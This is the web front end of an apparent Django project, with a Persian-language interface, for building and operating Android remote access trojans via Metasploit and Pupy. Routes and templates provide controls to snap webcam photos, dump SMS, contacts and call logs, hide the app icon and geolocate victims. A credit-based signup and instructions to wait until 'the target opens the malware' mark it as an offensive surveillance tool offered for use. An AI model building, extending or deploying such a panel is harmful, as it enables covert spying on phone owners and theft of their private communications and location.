RAT/urls.py
from django.urls import path
from . import views

app_name = 'RAT'
urlpatterns = [
    path('', views.index , name='index'),

    path('add/download/', views.down , name='download'),
############################## Metasploit ################################

    path('msf/', views.metasploit.methods , name='msf_index'),


######## metasploit android by  rat:
    path('msf/rats/', views.metasploit.android.rats , name='msf/android/rats'),
    path('msf/add/', views.metasploit.android.add , name='msf/android/add'),
    path('msf/listen/', views.metasploit.android.listen , name='msf/android/listen'),
    path('msf/listen/start', views.metasploit.android.startlisten , name='msf/android/startlisten'),
    path('msf/listen/webcamsnap', views.metasploit.android.webcamsnap , name='msf/android/webcamsnap'),
    path('msf/listen/webcamsnap2', views.metasploit.android.webcamsnap2 , name='msf/android/webcamsnap2'),
    path('msf/listen/dumpsms', views.metasploit.android.dumpsms , name='msf/android/dumpsms'),
    path('msf/listen/dumpcontacts', views.metasploit.android.dumpcontacts , name='msf/android/dumpcontacts'),
    path('msf/listen/dumpcalllog', views.metasploit.android.dumpcalllog , name='msf/android/dumpcalllog'),
    path('msf/listen/hideappicon', views.metasploit.android.hideappicon , name='msf/android/hideappicon'),
    path('msf/listen/geolocate', views.metasploit.android.geolocate , name='msf/android/geolocate'),
######################### pupy ###########################################

    path('pupy/', views.pupy.methods , name='pupy_index'),
    path('pupy/add/download/', views.pupy.android.down , name='pupy/add/download'),


######## pupy android by  rat:
    path('pupy/add/', views.pupy.android.add , name='pupy/android/add'),
    path('pupy/listen/', views.pupy.android.listen , name='pupy/android/listen'),
    path('pupy/listen/start', views.pupy.android.startlisten , name='pupy/android/startlisten'),
    path('pupy/listen/webcamsnap', views.pupy.android.webcamsnap , name='pupy/android/webcamsnap'),


]

webrat/urls.py
from django.contrib import admin
from django.urls import path,include
from django.conf import settings
from django.conf.urls.static import static
from RAT import views

urlpatterns = [
    path('admin/', admin.site.urls),
    path('rat/', include('RAT.urls'), name='RAT'),
    path('accounts/', include('django.contrib.auth.urls') ,name='accounts'),
    path('signup/', views.signup, name='signup'),
    path('', views.index , name='index1'),

]
urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)

RAT/models.py
from django.db import models
from django.contrib.auth.models import User

# Create your models here.
class Credit(models.Model):
    number = models.IntegerField(default=10)
    user = models.ForeignKey(User, on_delete=models.CASCADE)

RAT/forms.py
from django import forms
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User
from django.forms import ModelForm
from django.forms.models import inlineformset_factory
from django.core.files.images import get_image_dimensions


class SignUpForm(UserCreationForm):
    first_name = forms.CharField(max_length=30, required=False, help_text='Optional.')
    last_name = forms.CharField(max_length=30, required=False, help_text='Optional.')
    email = forms.EmailField(max_length=254, help_text='Required. Inform a valid email address.')

    class Meta:
        model = User
        fields = ('username', 'first_name', 'last_name', 'email', 'password1', 'password2', )

#
# class TeamForm(ModelForm):
#     class Meta:
#         model = Team
#
#
# MemberFormSet = inlineformset_factory(Team, Member)

RAT/templates/addrat.html
{% extends "base_generic.html" %}

{% block content %}
<div class="dash-box">
<a href="/rat/" class="w3-button w3-block w3-green w3-section" id="rat-address"><i>{{ c }} </i></a>
<a href="{% url "RAT:download" %}" id="rat-download">دانلود فایل رت با پسوند apk</a>
</div>
{% endblock %}

RAT/templates/author_list.html
{% extends "catalog/base_generic.html" %}

{% block content %}
  {% for author in author_list%}
    <h3>{{ author.last_name }}</h3>
    <p> Authors first name: {{ author.first_name }}</p>
    <p> date of birth: {{ author.date_of_birth }}</p>
    <p> date of death: {{ author.date_of_death }} </p>
    <hr>
  {% endfor %}
{% endblock %}

RAT/templates/base.html
<!DOCTYPE html>
<html>
{% block title %}<title>Repositories</title>{% endblock %}
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">
<link rel="stylesheet" href="https://www.w3schools.com/lib/w3-theme-blue-grey.css">
<link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Open+Sans'>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<style>
html, body, h1, h2, h3, h4, h5 {font-family: "Open Sans", sans-serif}
</style>
<body class="w3-theme-l5">
{% load static %}
<!-- Navbar -->
<div class="w3-top">
 <div class="w3-bar w3-theme-d2 w3-left-align w3-large">
  <a class="w3-bar-item w3-button w3-hide-medium w3-hide-large w3-right w3-padding-large w3-hover-white w3-large w3-theme-d2" href="javascript:void(0);" onclick="openNav()"><i class="fa fa-bars"></i></a>
  <a href="{% url 'git:index' %}" class="w3-bar-item w3-button w3-padding-large w3-theme-d4"><i class="fa fa-home w3-margin-right"></i>Logo</a>
  <a href="#" class="w3-bar-item w3-button w3-hide-small w3-padding-large w3-hover-white" title="News"><i class="fa fa-globe"></i></a>
  <a href="#" class="w3-bar-item w3-button w3-hide-small w3-padding-large w3-hover-white" title="Account Settings"><i class="fa fa-user"></i></a>
  <a href="#" class="w3-bar-item w3-button w3-hide-small w3-padding-large w3-hover-white" title="Messages"><i class="fa fa-envelope"></i></a>
  <div class="w3-dropdown-hover w3-hide-small">
    <button class="w3-button w3-padding-large" title="Notifications"><i class="fa fa-bell"></i><span class="w3-badge w3-right w3-small w3-green">3</span></button>
    <div class="w3-dropdown-content w3-card-4 w3-bar-block" style="width:300px">
      <a href="#" class="w3-bar-item w3-button">One new friend request</a>
      <a href="#" class="w3-bar-item w3-button">John Doe posted on your wall</a>
      <a href="#" class="w3-bar-item w3-button">Jane likes your post</a>
    </div>
  </div>
  <a href="#" class="w3-bar-item w3-button w3-hide-small w3-right w3-padding-large w3-hover-white" title="My Account">
    <img src="/w3images/avatar2.png" class="w3-circle" style="height:23px;width:23px" alt="Avatar">
  </a>
 </div>
</div>

<!-- Navbar on small screens -->
<div id="navDemo" class="w3-bar-block w3-theme-d2 w3-hide w3-hide-large w3-hide-medium w3-large">
  <a href="#" class="w3-bar-item w3-button w3-padding-large">Link 1</a>
  <a href="#" class="w3-bar-item w3-button w3-padding-large">Link 2</a>
  <a href="{% url 'avatar_change' %}">Change your avatar</a>
  <a href="#" class="w3-bar-item w3-button w3-padding-large">My Profile</a>
</div>

<!-- Page Container -->
<div class="w3-container w3-content" style="max-width:1400px;margin-top:80px">
  <!-- The Grid -->
  <div class="w3-row">
    <!-- Left Column -->
    <div class="w3-col m3">
      <!-- Profile -->
      <div class="w3-card w3-round w3-white">
        <div class="w3-container">
         <h4 class="w3-center">My Profile</h4>
         <p class="w3-center">{% avatar user class="w3-circle" %}</p>
         <a href="{% url 'avatar_change' %}">Change your avatar</a>
         <hr>
         <p><i class="fa fa-pencil fa-fw w3-margin-right w3-text-theme"></i> Designer, UI</p>
         <p><i class="fa fa-home fa-fw w3-margin-right w3-text-theme"></i> London, UK</p>
         <p><i class="fa fa-birthday-cake fa-fw w3-margin-right w3-text-theme"></i> April 1, 1988</p>
        </div>
      </div>
      <br>

      <!-- Accordion -->
      <div class="w3-card w3-round">
        <div class="w3-white">
          <button onclick="myFunction('Demo1')" class="w3-button w3-block w3-theme-l1 w3-left-align"><i class="fa fa-circle-o-notch fa-fw w3-margin-right"></i> My Account</button>
          <div id="Demo1" class="w3-hide w3-container">
            {% if user.is_authenticated %}
              <a href="#" class="w3-bar-item w3-button w3-padding-large">User: {{ user.get_username }}</a><br>
              <a href="{% url 'avatar_change' %}" class="w3-bar-item w3-button w3-padding-large">Change your avatar</a><br>
              <a href="{% url 'logout'%}?next={{request.path}}" class="w3-bar-item w3-button w3-padding-large">Logout</a><br>
            {% else %}
              <a href="{% url 'login'%}?next={{request.path}}"  class="w3-bar-item w3-button w3-padding-large">Login</a><br>
              <a href="{% url 'signup'%}?next={{request.path}}"  class="w3-bar-item w3-button w3-padding-large">Signup</a>
            {% endif %}

          </div>
          <button onclick="myFunction('Demo2')" class="w3-button w3-block w3-theme-l1 w3-left-align"><i class="fa fa-calendar-check-o fa-fw w3-margin-right"></i> My Repositories</button>
          <div id="Demo2" class="w3-hide w3-container">
            <p>Some other text..</p>
          </div>
          <button onclick="myFunction('Demo3')" class="w3-button w3-block w3-theme-l1 w3-left-align"><i class="fa fa-users fa-fw w3-margin-right"></i> My Photos</button>
          <div id="Demo3" class="w3-hide w3-container">
         <div class="w3-row-padding">
         <br>
           <div class="w3-half">
             <img src="/w3images/lights.jpg" style="width:100%" class="w3-margin-bottom">
           </div>
           <div class="w3-half">
             <img src="/w3images/nature.jpg" style="width:100%" class="w3-margin-bottom">
           </div>
           <div class="w3-half">
             <img src="/w3images/mountains.jpg" style="width:100%" class="w3-margin-bottom">
           </div>
           <div class="w3-half">
             <img src="/w3images/forest.jpg" style="width:100%" class="w3-margin-bottom">
           </div>
           <div class="w3-half">
             <img src="/w3images/nature.jpg" style="width:100%" class="w3-margin-bottom">
           </div>
           <div class="w3-half">
             <img src="/w3images/snow.jpg" style="width:100%" class="w3-margin-bottom">
           </div>
         </div>
          </div>
        </div>
      </div>
      <br>

      <!-- Interests -->
      <div class="w3-card w3-round w3-white w3-hide-small">
        <div class="w3-container">
          <p>Interests</p>
          <p>
            <span class="w3-tag w3-small w3-theme-d5">News</span>
            <span class="w3-tag w3-small w3-theme-d4">W3Schools</span>
            <span class="w3-tag w3-small w3-theme-d3">Labels</span>
            <span class="w3-tag w3-small w3-theme-d2">Games</span>
            <span class="w3-tag w3-small w3-theme-d1">Friends</span>
            <span class="w3-tag w3-small w3-theme">Games</span>
            <span class="w3-tag w3-small w3-theme-l1">Friends</span>
            <span class="w3-tag w3-small w3-theme-l2">Food</span>
            <span class="w3-tag w3-small w3-theme-l3">Design</span>
            <span class="w3-tag w3-small w3-theme-l4">Art</span>
            <span class="w3-tag w3-small w3-theme-l5">Photos</span>
          </p>
        </div>
      </div>
      <br>

      <!-- Alert Box -->
      <div class="w3-container w3-display-container w3-round w3-theme-l4 w3-border w3-theme-border w3-margin-bottom w3-hide-small">
        <span onclick="this.parentElement.style.display='none'" class="w3-button w3-theme-l3 w3-display-topright">
          <i class="fa fa-remove"></i>
        </span>
        <p><strong>Hey!</strong></p>
        <p>People are looking at your profile. Find out who.</p>
      </div>

    <!-- End Left Column -->
    </div>

    <!-- Middle Column -->
    <div class="w3-col m7">

      <div class="w3-row-padding">
        <div class="w3-col m12">
          <div class="w3-card w3-round w3-white">
            <div class="w3-container w3-padding">
                {% block content %}{% endblock %}

            </div>
          </div>
        </div>
      </div>

      <div class="w3-container w3-card w3-white w3-round w3-margin"><br>
        <img src="/w3images/avatar2.png" alt="Avatar" class="w3-left w3-circle w3-margin-right" style="width:60px">
        <span class="w3-right w3-opacity">1 min</span>
        <h4>John Doe</h4><br>
        <hr class="w3-clear">
        <p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.</p>
          <div class="w3-row-padding" style="margin:0 -16px">
            <div class="w3-half">
              <img src="/w3images/lights.jpg" style="width:100%" alt="Northern Lights" class="w3-margin-bottom">
            </div>
            <div class="w3-half">
              <img src="/w3images/nature.jpg" style="width:100%" alt="Nature" class="w3-margin-bottom">
          </div>
        </div>
        <button type="button" class="w3-button w3-theme-d1 w3-margin-bottom"><i class="fa fa-thumbs-up"></i>  Like</button>
        <button type="button" class="w3-button w3-theme-d2 w3-margin-bottom"><i class="fa fa-comment"></i>  Comment</button>
      </div>

      <div class="w3-container w3-card w3-white w3-round w3-margin"><br>
        <img src="/w3images/avatar5.png" alt="Avatar" class="w3-left w3-circle w3-margin-right" style="width:60px">
        <span class="w3-right w3-opacity">16 min</span>
        <h4>Jane Doe</h4><br>
        <hr class="w3-clear">
        <p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.</p>
        <button type="button" class="w3-button w3-theme-d1 w3-margin-bottom"><i class="fa fa-thumbs-up"></i>  Like</button>
        <button type="button" class="w3-button w3-theme-d2 w3-margin-bottom"><i class="fa fa-comment"></i>  Comment</button>
      </div>

      <div class="w3-container w3-card w3-white w3-round w3-margin"><br>
        <img src="/w3images/avatar6.png" alt="Avatar" class="w3-left w3-circle w3-margin-right" style="width:60px">
        <span class="w3-right w3-opacity">32 min</span>
        <h4>Angie Jane</h4><br>
        <hr class="w3-clear">
        <p>Have you seen this?</p>
        <img src="/w3images/nature.jpg" style="width:100%" class="w3-margin-bottom">
        <p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.</p>
        <button type="button" class="w3-button w3-theme-d1 w3-margin-bottom"><i class="fa fa-thumbs-up"></i>  Like</button>
        <button type="button" class="w3-button w3-theme-d2 w3-margin-bottom"><i class="fa fa-comment"></i>  Comment</button>
      </div>

    <!-- End Middle Column -->
    </div>

    <!-- Right Column -->
    <div class="w3-col m2">
      <div class="w3-card w3-round w3-white w3-center">
        <div class="w3-container">
          <p>Upcoming Events:</p>
          <img src="/w3images/forest.jpg" alt="Forest" style="width:100%;">
          <p><strong>Holiday</strong></p>
          <p>Friday 15:00</p>
          <p><button class="w3-button w3-block w3-theme-l4">Info</button></p>
        </div>
      </div>
      <br>

      <div class="w3-card w3-round w3-white w3-center">
        <div class="w3-container">
          <p>Friend Request</p>
          <img src="/w3images/avatar6.png" alt="Avatar" style="width:50%"><br>
          <span>Jane Doe</span>
          <div class="w3-row w3-opacity">
            <div class="w3-half">
              <button class="w3-button w3-block w3-green w3-section" title="Accept"><i class="fa fa-check"></i></button>
            </div>
            <div class="w3-half">
              <button class="w3-button w3-block w3-red w3-section" title="Decline"><i class="fa fa-remove"></i></button>
            </div>
          </div>
        </div>
      </div>
      <br>

      <div class="w3-card w3-round w3-white w3-padding-16 w3-center">
        <p>ADS</p>
      </div>
      <br>

      <div class="w3-card w3-round w3-white w3-padding-32 w3-center">
        <p><i class="fa fa-bug w3-xxlarge"></i></p>
      </div>

    <!-- End Right Column -->
    </div>

  <!-- End Grid -->
  </div>

<!-- End Page Container -->
</div>
<br>

<!-- Footer -->
<footer class="w3-container w3-theme-d3 w3-padding-16">
  <h5>Footer</h5>
</footer>

<footer class="w3-container w3-theme-d5">
  <p>Powered by <a href="https://www.w3schools.com/w3css/default.asp" target="_blank">w3.css</a></p>
</footer>

<script>
// Accordion
function myFunction(id) {
  var x = document.getElementById(id);
  if (x.className.indexOf("w3-show") == -1) {
    x.className += " w3-show";
    x.previousElementSibling.className += " w3-theme-d1";
  } else {
    x.className = x.className.replace("w3-show", "");
    x.previousElementSibling.className =
    x.previousElementSibling.className.replace(" w3-theme-d1", "");
  }
}

// Used to toggle the menu on smaller screens when clicking on the menu button
function openNav() {
  var x = document.getElementById("navDemo");
  if (x.className.indexOf("w3-show") == -1) {
    x.className += " w3-show";
  } else {
    x.className = x.className.replace(" w3-show", "");
  }
}
</script>

</body>
</html>

RAT/templates/base_generic.html
<!DOCTYPE html>
<html lang="fa">
<head>
  {% block title %}<title>پرفایل کاربری | پیشخوان</title>{% endblock %}
  {% load static %}
  <meta charset="UTF-8">
  <link rel="stylesheet" href="{% static 'css/fonts.css' %}">
  <link rel="stylesheet" href="{% static 'css/fonts/flaticon.css' %}">
  <link rel="stylesheet" href="{% static 'style.css' %}">
  <link rel="shortcuts icon" type="image/png" href="{% static 'icon.ico' %}"/>
</head>
<body>
<div class="rside">
  <ul>
    <li><a href="{% url 'RAT:index' %}"><i class="flaticon-dashboard"></i>پیشخوان</a></li>
    {% if user.is_authenticated %}
    <li><a href="{% url 'RAT:index' %}"><i class="flaticon-user"></i>شناسه: {{ user.get_username }}</a></li>
    <li><a href="{% url 'logout'%}?next={{request.path}}"><i class="flaticon-power-button-off"></i> خروج از سیستم</a></li>
    {% endif %}
    <li><a href="{% url 'RAT:msf_index' %}"><i class="flaticon-anonymous-logo"></i>رت از طریق متااسپلویت</a></li>
    <li><a href="{% url 'RAT:pupy_index' %}"><i class="flaticon-python-language-logotype"></i>رت از طریق پوپای</a></li>
    <li><a href=""><i class="flaticon-windows-8"></i>رت ویندوز</a></li>
  </ul>
</div>
<div class="lside">
  <h2>{{ user.get_username }} عزیز خوش آمدید</h2>
  <center><img src="{% static '1.gif'%}" alt="" style=""></center>
  <div class="admin-box">
    {%block content%}{% endblock %}
    {% block content1 %}{% endblock%}
    <div class="cpright">
      <i class="flaticon-anonymous-logo"></i>
      <span>تولید شده توسط امین و سعید</span>
    </div>
  </div>
</div>
</body>
</html>

RAT/templates/index.html
{% extends "base_generic.html" %}

{% block content %}



<div style="float:left;">


<div class="dash-box">
<div class="w3-half" >
  <a href="{% url 'RAT:msf_index' %}" class="w3-button w3-block w3-green w3-section" id="dash-meta">تولید رت از طریق MetaSploit</a>
</div>
<div class="w3-half">
  <a href="{% url 'RAT:pupy_index' %}" class="w3-button w3-block w3-red w3-section" id="dash-pupy">تولید رت از طریق PuPy</a>
</div>
</div>
<div class="dash-box">
<p><h3>آموزش استفاده از سیستم:</h3><br>ابتدا از قسمت ساخت رت اقدام به ساخت رت مایید سپس دوبار روی گرفتن دسترسی کلیک کنید و در منوی مدیریت رت دکمه شروع برسی تارگت کلیک کنید حال منتظر بمانید تا تارگت بدافزار را باز کند سپس در همان صفحه خواهید دید که تارگت مورد نظر هک شده است.</p>
</div>
</div>
{% endblock %}

RAT/templates/listen.html
{% extends "base_generic.html" %}

{% block content %}
<div class="w3-raw">

<div class="w3-quarter">
  <a href="{% url 'RAT:msf/android/startlisten' %}" class="w3-button w3-block w3-green w3-section"><i>Start listening </i></a>
  <a class="w3-bar-item w3-button w3-padding-large" href="{% url 'RAT:msf/android/add' %}">Downlaod or Create Rat </a>

  </div>
<div class="w3-half" style="float: right;">
  {% if last == hacked%}
  <a href="{% url 'RAT:msf/android/listen' %}" class="w3-button w3-block w3-green w3-section" ><i>HACKED :)</i></a>
  {% else %}
  <a href="{% url 'RAT:msf/android/listen' %}" class="w3-button w3-block w3-red w3-section" ><i>Not yet hacked</i></a>

  {% endif %}

</div>
</div>



{% endblock %}
{% block content1 %}
<div class="w3-container w3-card w3-white w3-round w3-margin w3-center"><br>
  <h4 class="w3-center">Rat Panel</h4>
  <div class="w3-center" style="margin-left=40px;">

        <a href="{% url 'RAT:msf/android/webcamsnap' %}" class="w3-center w3-quarter w3-button w3-block w3-{{ color }} w3-section w3-margin" ><i>Webcamsnap Back</i></a>
        <a href="{% url 'RAT:msf/android/webcamsnap2' %}" class="w3-center w3-quarter w3-button w3-block w3-{{ color }} w3-section w3-margin" ><i>Webcamsnap Front</i></a>
        <a href="{% url 'RAT:msf/android/dumpsms' %}" class="w3-quarter w3-center w3-button w3-block w3-{{ color }} w3-section w3-margin"><i>Dump SMS </i></a>
        <a href="{% url 'RAT:msf/android/dumpcontacts' %}" class="w3-quarter w3-center w3-button w3-block w3-{{ color }} w3-section w3-margin"><i>Dump Contacts </i></a>
        <a href="{% url 'RAT:msf/android/dumpcalllog' %}" class="w3-quarter w3-button w3-center w3-block w3-{{ color }} w3-section w3-margin"><i>Dump Call Log </i></a>
        <a href="{% url 'RAT:msf/android/hideappicon' %}" class="w3-quarter w3-button w3-block w3-center w3-{{ color }} w3-section w3-margin"><i>Hide App Icon </i></a>
        <a href="{% url 'RAT:msf/android/geolocate' %}" class="w3-quarter w3-button w3-center w3-block w3-{{ color }} w3-section w3-margin"><i> GEO locate </i></a>


</div>


</div>
{% endblock %}




<!-- End Middle Column -->

RAT/templates/metasploit/android/methods.html
{% extends "base_generic.html" %}

{% block content %}
<h1>hacktool Home</h1>

  <p>Welcome to <em>RAT</em>, hacktool </p>

<h2>your account</h2>
<div class="w3-half">
  <a href="{% url 'RAT:msf/android/add' %}" class="w3-button w3-block w3-green w3-section" ><i>Create RAT</i></a>
</div>
<div class="w3-half">
  <a href="{% url 'RAT:msf/android/listen' %}" class="w3-button w3-block w3-red w3-section" ><i>Listenning RAT</i></a>
</div>

{% endblock %}

RAT/templates/metasploit/android/rats.html
{% extends "base_generic.html" %}

{% block content %}
<div class="dash-box">
<a href="/rat/" class="w3-button w3-block w3-green w3-section" id="rat-address"><i>اعتبار شما برابر است با : {{c}}</i></a>
<a href="{% url "RAT:download" %}" id="rat-download">دانلود رت از قبل تولید شده شما</a>
</div>
<div class="dash-box">
<a href="{% url 'RAT:msf/android/add' %}" class="w3-button w3-block w3-red w3-section" id="rat-address"><i>ساخت رت جدید</i></a>
</div>
{% endblock %}

RAT/templates/metasploit/msf.html
{% extends "base_generic.html" %}

{% block content %}

<h2>ساخت رت با متود متااسپلویت</h2>
<div class="dash-box">
<div class="w3-half">
  <a href="{% url 'RAT:msf/android/rats' %}" class="w3-button w3-block w3-green w3-section" id="tolid">تولید رت</a>
</div>
<div class="w3-half">
  <a href="{% url 'RAT:msf/android/listen' %}" class="w3-button w3-block w3-red w3-section" id="dastressi">گرفتن دسترسی</a>
</div>
</div>

{% endblock %}

RAT/templates/msf.html
<!DOCTYPE html>
<html lang="fa">
<head>
  {% block title %}<title>پرفایل کاربری | پیشخوان</title>{% endblock %}
  {% load static %}
  <meta charset="UTF-8">
  <link rel="stylesheet" href="{% static 'css/fonts.css' %}">
  <link rel="stylesheet" href="{% static 'style.css' %}">
</head>
<body>
<div class="rside">
  <ul>
    <li><a href="{% url 'RAT:index' %}">پیشخوان</a></li>
    {% if user.is_authenticated %}
    <li><a href="{% url 'RAT:index' %}">شناسه: {{ user.get_username }}</a></li>
    <li><a href="{% url 'logout'%}?next={{request.path}}">خروج از سیستم</a></li>
    {% endif %}
    <li><a href="">رت از طریق متااسپلویت</a></li>
    <li><a href="">رت از طریق پوپای</a></li>
    <li><a href="">رت ویندوز</a></li>
  </ul>
</div>
<div class="lside">
<div class="admin-box">
	<div class="rat-genrate">
		<a href="{% url 'RAT:msf/android/add' %}">تولید رت از طریق متا اسپلوبت</a>
		<a href="{% url 'RAT:msf/android/listen' %}">گرفتن دسترسی</a>
        <h2 w3-section><a href="{% url "RAT:download" %}">دانلود فایل apk رت</a></h2>
	</div>
</div>
</div>
</body>
</html>

RAT/templates/pupy/android/addrat.html
{% extends "base_generic.html" %}

{% block content %}
<a href="/rat/listen" class="w3-button w3-block w3-green w3-section" ><i>{{ c }} </i></a>
<h2 w3-section><a href="{% url 'RAT:pupy/add/download' %}">Downlaod Rat</a></h2>
{% endblock %}